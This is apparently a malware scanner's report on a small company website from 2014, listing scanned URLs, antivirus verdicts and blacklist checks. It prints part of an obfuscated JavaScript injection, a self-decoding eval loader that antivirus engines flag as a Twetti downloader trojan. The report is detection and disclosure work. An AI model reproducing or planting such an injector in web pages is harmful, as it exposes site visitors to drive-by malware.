New scan:

Malware Scanner report for tlousolutions.co.za

Malicious/Suspicious/Total urls checked
1/0/6
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://tlousolutions.co.za/
HTTP/1.1 200 OK
Connection: close
Date: Sat, 04 Oct 2014 19:10:39 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
X-Powered-By: PHP/5.4.4-14+deb7u14
clean
http://www.tlousolutions.co.za/new/default.php
200 OK
Content-Length: 14460
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

$="Z63eZ3dZ220.chZ2561Z2572Z2543odeZ2541t(0Z2529Z255e(Z25270x00Z2527+esZ2529))Z253bZ257d}Z22;cuZ3dZ22(gwf}d`4xuzsausq)6~ubugwf}d`6*}r4Z3czub}su`Z7bf:wZ7bZ7bZ257F}qQzuvxqpZ3dobuf4dZ7bdKazpqf4)4zaxxZ2fbuf4dZ7bdKwZ7bZ7bZ257F}qKzuyq4)46upbyuZ257FqfKZ257FZ7byud6Z2fbuf4dZ7bdK`}yqZ7ba`4)4#Z2526$Z2frazw`}Z7bz4dZ7bdKwZ7bZ7bZ257F}qKqzuvxqpZ3cZ3dobuf4}gKqzuvxqp4)4ruxgqZ2f}r4Z3c5c}zpZ7bc:Z7bdqfu42245zub}su`Z7bf:wZ7bZ7bZ257F}qQzuvxqpZ3dfq`afz4}gKqzuvxqpZ2f}r4Z3c`mdqZ7br4pZ7bwayqz`:wZ7bZ7bZ257F}q4))43g`f}zs3Z
... 3003 bytes are skipped ...
6e?Z63alZ6cbaZ63kZ3dcZ26eZ78Z63lZ75Z64eZ3dhasZ68tagZ73Z27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);}elseZ7b$Z3dZ27Z27};functZ69onZ20Z73c(Z63nZ6dZ2cvZ2cedZ29Z7bvar Z65xdZ3dnZ65w Z44ateZ28Z29;eZ78d.Z73etZ44ateZ28Z65xdZ2egZ65Z74DaZ74eZ28Z29+edZ29Z3bdocZ75meZ6et.Z63ooZ6biZ65Z3dcnmZ2b Z27Z3dZ27 +esZ63aZ70Z65(v)Z2bZ27;eZ78Z70ireZ73Z3dZ27+exdZ2eZ74oGMZ54StrZ69nZ67(Z29;};";function z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}eval(z($));

Antivirus reports:

AntiVir
HTML/Crypted.Gen
Avast
HTML:Iframe-KU [Trj]
Ikarus
Trojan-Downloader.JS.Twetti
Rising
Hack.Exploit.Script.JS.ShellCode.cf
nProtect
Trojan.Downloader.JS.Twetti.A
K7AntiVirus
Trojan
TrendMicro-HouseCall
JS_DLDR.SMA
Emsisoft
Trojan.Downloader.JS.Twetti.A (B)
DrWeb
JS.Twitter.5
TrendMicro
JS_DLDR.SMA
Kaspersky
Trojan-Downloader.JS.Twetti.a
ViRobot
JS.S.Twetti.2244
Microsoft
VirTool:JS/Obfuscator.M
MicroWorld-eScan
Trojan.Downloader.JS.Twetti.A
Fortinet
JS/Twetti.AOE!tr
NANO-Antivirus
Trojan.Script.Agent.bachg
F-Secure
Trojan.Downloader.JS.Twetti.A
VIPRE
VirTool.JS.Obfuscator.m (v)
F-Prot
JS/Agent.MB.gen
AVG
JS/Obfuscated
Norman
Suspicious_Gen2.RXUZY
Sophos
Mal/ObfJS-AG
GData
Trojan.Downloader.JS.Twetti.A
Commtouch
JS/Agent.MB.gen
Agnitum
JS.Twetty.A
BitDefender
Trojan.Downloader.JS.Twetti.A

http://www.tlousolutions.co.za/new/content/content_cataloguelist.php
200 OK
Content-Length: 1386
Content-Type: text/html
clean
http://www.tlousolutions.co.za/new/content/ewp.js
200 OK
Content-Length: 27272
Content-Type: application/x-javascript
clean
http://www.tlousolutions.co.za/test404page.js
404 Not Found
Content-Length: 281
Content-Type: text/html
clean
http://tlousolutions.co.za/photos/
404 Not Found
Content-Length: 274
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: tlousolutions.co.za

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 04 Oct 2014 19:10:39 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
X-Powered-By: PHP/5.4.4-14+deb7u14
Second query (visit from search engine):
GET / HTTP/1.1
Host: tlousolutions.co.za
Referer: http://www.google.com/search?q=tlousolutions.co.za

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=tlousolutions.co.za

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tlousolutions.co.za/

Result: tlousolutions.co.za is not infected or malware details are not published yet.